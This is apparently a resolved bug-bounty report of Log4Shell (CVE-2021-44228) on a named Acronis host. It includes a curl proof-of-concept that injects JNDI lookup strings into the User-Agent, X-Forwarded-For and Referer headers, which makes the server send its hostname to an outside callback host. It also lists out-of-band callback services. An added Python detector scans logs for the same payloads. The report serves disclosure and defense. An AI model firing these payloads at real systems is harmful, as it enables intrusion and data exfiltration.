[CVE-2021-44228] Arbitrary Code Execution on ng01-cloud.acronis.com
Critical
## Vulnerability Details
### Description
The application is using a vulnerable version of Log4j which allows arbitrary remote command execution. The vulnerability is also known as Log4Shell and is assigned [CVE-2021-44228](https://www.randori.com/blog/cve-2021-44228/).
### Reproduction Steps
For easier reproduction, please use Burp Collaborator and issue the following curl command with your Collaborator instance URL:
```bash
curl --http1.1 --silent --output /dev/null \
--header 'User-agent: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \
--header 'X-Forwarded-For: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \
--header 'Referer: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \
https://ng01-cloud.acronis.com
```
You should receive a request to your Collaborator Client with your server's hostname as the prefix. That should suffice to prove that the host is vulnerable. The hostname I received was `ng01-cloud-elk-ls-vm01`.
Note that it may take some time to receive the pingbacks. In case Burp Collaborator doesn't work, I'd advise using your own. Some alternatives are:
1. dig.pm
2. app.interactsh.com
3. dnslog.cn
4. pingb.in
5. requestbin.net
6. canarytokens.com
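As an added defender-side example (not part of the original report), the following Python scans access-log lines for the `${jndi:...}` lookup strings the report places in the Referer, User-Agent and X-Forwarded-For headers, and separately labels payloads that nest a second lookup such as the `${hostName}` prefix. The log lines and the `collab.example` callback host are constructed for the example.

```python
import re
from typing import List, Optional

# Constructed sample lines: combined-log format with X-Forwarded-For appended
# as a final quoted field. Not real traffic; collab.example is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "https://example.net/" "Mozilla/5.0" "-"
203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://${hostName}.collab.example/a}" "-"
203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.79.1" "${jndi:ldap://collab.example/a}"
203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET /docs HTTP/1.1" 200 1024 "${JNDI:rmi://collab.example/x}" "Mozilla/5.0" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)
# A Log4j lookup that hands the string to JNDI, e.g. ${jndi:ldap://...}.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
# Any innermost ${...} lookup. A lookup nested inside a JNDI URL (the report's
# ${hostName}) means server-side values are being read into the callback name.
LOOKUP_RE = re.compile(r'\$\{[^{}]*\}')

HEADER_FIELDS = ("referer", "ua", "xff")


def classify_value(value: str) -> Optional[str]:
    """Return a finding label for one header value, or None if it is clean."""
    if not JNDI_RE.search(value):
        return None
    # Strip innermost lookups; if a lookup is still left, the JNDI one wrapped
    # another lookup (nested), otherwise it stood alone.
    remaining = LOOKUP_RE.sub("", value)
    return "jndi-nested" if LOOKUP_RE.search(remaining) else "jndi"


def scan_log(text: str) -> List[dict]:
    """Scan access-log text; return one finding per (line, header) hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line; real tooling should count these too
        for field in HEADER_FIELDS:
            label = classify_value(m.group(field))
            if label:
                findings.append({"line": lineno, "ip": m.group("ip"),
                                 "header": field, "label": label})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```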
### Reference
https://www.lunasec.io/docs/blog/log4j-zero-day/
## Impact
Arbitrary remote code execution
Report Stats
- Report ID: 1459714
- State: Closed
- Substate: resolved
- Upvotes: 29